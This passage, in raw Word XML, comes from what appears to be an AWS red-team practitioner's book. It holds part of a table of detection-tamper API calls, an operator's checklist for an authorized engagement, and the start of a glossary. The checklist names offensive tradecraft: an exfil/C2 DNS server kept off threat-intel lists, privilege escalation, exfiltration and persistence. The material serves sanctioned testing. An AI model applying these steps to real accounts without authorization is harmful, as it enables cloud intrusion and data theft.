              </w:rPr>
              <w:t>DeleteDetector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058CBAC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Detection tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02E5E48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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="444D98FA" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CE1BA5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config.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB666C3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DeleteConfigurationRecorder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32910183"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Detection tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FF3BAAE"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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="0B156531" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF27AB8"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organizations.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="445AE51F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DetachPolicy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E14AEE6"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Restriction lift</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A86A930" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ED7B89B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Appendix D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Operator's Checklist for a New Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1E7C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A chronological checklist that a practitioner can follow from kickoff through debrief. The list is deliberately opinionated; individual items can be skipped where scope does not apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B686FA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>D.1  Pre-engagement (days -14 to 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C65070D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Confirm rules of engagement in writing: scope, excluded accounts/regions/services, impact-primitive authorization, point of contact for emergencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC5C95" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Provision attacker AWS account with (a) a receiving S3 bucket with an appropriate resource policy to accept writes from any role the client might configure, (b) a KMS key with a policy permitting cross-account grant-creation, (c) an EC2 instance for inside-AWS credential usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D089851" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Register attacker infrastructure domain(s); set up a DNS authoritative server for exfil/C2; ensure IP addresses are not in any threat-intel feed (check Spamhaus, AWS's own reputation lists, GuardDuty threat list format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC8539B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Install and test CloudFox, Pacu, PMapper, ScoutSuite, Prowler, TruffleHog, aws-vault, Stratus Red Team on the engagement laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C6F00" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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Stand up </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the personal operator harness (Section 18.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B190E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>D.2  Initial access (days 0-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D27EC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Execute the scoped entry vector — external recon, phishing, OIDC abuse, credential injection — as authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737149B2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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First credential in hand: run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sts get-caller-identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, record account id, partition, arn, principal type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C251E02" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Run CloudFox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>all-checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the scoped profile; redirect output to the engagement folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD25BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Run Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__enum_permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the principal and export the permission map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089DBCE6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Run PMapper to build the graph; save the graph to the engagement folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266472FC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>D.3  Escalation and lateral movement (days 2-4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C068F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Run Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4940F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Enumerate OIDC providers; parse each trusted role's trust policy for over-broadening (Chapter 19).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA0E3E1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Enumerate resource-policy-sharing: S3 bucket policies, KMS key policies, Lambda resource policies, Secrets Manager resource policies, ECR repository policies, SNS/SQS resource policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2353262D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Enumerate cross-account: AWS RAM shares, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> presence, VPC peering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC545B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Execute privilege-escalation primitives as scope allows; document each in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CEFE3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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For every new principal assumed, rerun CloudFox and PMapper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BC694" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>D.4  Objective execution (days 5-7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E2A47" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Verify the engagement's success criteria (typically some access or capability against a specified resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8D237" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Execute exfiltration primitives as authorized, using service-side paths for bulk and service-to-internet only for small high-value pulls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D55B73" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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If impact primitives are authorized, execute against the designated demonstration objects only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2231F5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Establish one persistence primitive from the identity family and one from the configuration family, if scope permits, so that the client can validate their detection of each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E33C0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>D.5  Wrap-up (days 8-10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D839377" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Clean up: revoke attacker access keys, remove attacker IAM users/roles, remove attacker resource-policy entries, close attacker-created OIDC providers (if any), drop snapshot shares, remove bucket replication rules if they were for testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD26C8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Document each cleanup action in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>; the cleanup record appears in the report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4285855F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 xml:space="preserve">Pull the CloudTrail evidence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws cloudtrail lookup-events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> filtered on operator principal ARN across the engagement window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A68A1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Write the report per Chapter 20's template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C972C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Schedule and deliver the live debrief.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF02CAF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEE3D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ABAC (Attribute-Based Access Control).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM model that authorizes actions based on tags on the principal and tags on the resource, rather than only on identity. Susceptible to self-tagging escalation when principals hold </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:TagUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:TagSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6497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Access Analyzer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM service that identifies resources shared with principals outside a defined zone of trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CA50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Access key.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A long-lived AWS API credential pair for an IAM user; access key id (prefix AKIA) and secret access key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33FF1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AssumeRole.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The STS API that issues temporary session credentials for a role. Entry point for role chaining and cross-account access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE17B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AssumeRoleWithWebIdentity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The STS API that exchanges an OIDC token for session credentials; used by GitHub Actions, Cognito identity pools, and EKS IRSA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A713CD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AWS Managed Key.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A KMS key managed by AWS on behalf of the customer (for example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws/ebs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws/rds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>); not cross-account shareable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75390BF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Blast radius.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The set of resources, principals, and services that are reachable from a given compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D754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CloudFox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bishop Fox's open-source opinionated AWS reconnaissance tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D8D73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CloudGoat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rhino Security Labs's vulnerable-by-design AWS lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5628C"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CloudTrail.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS's API audit log service; records every management API call and, if configured, data events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162819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Cognito identity pool.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
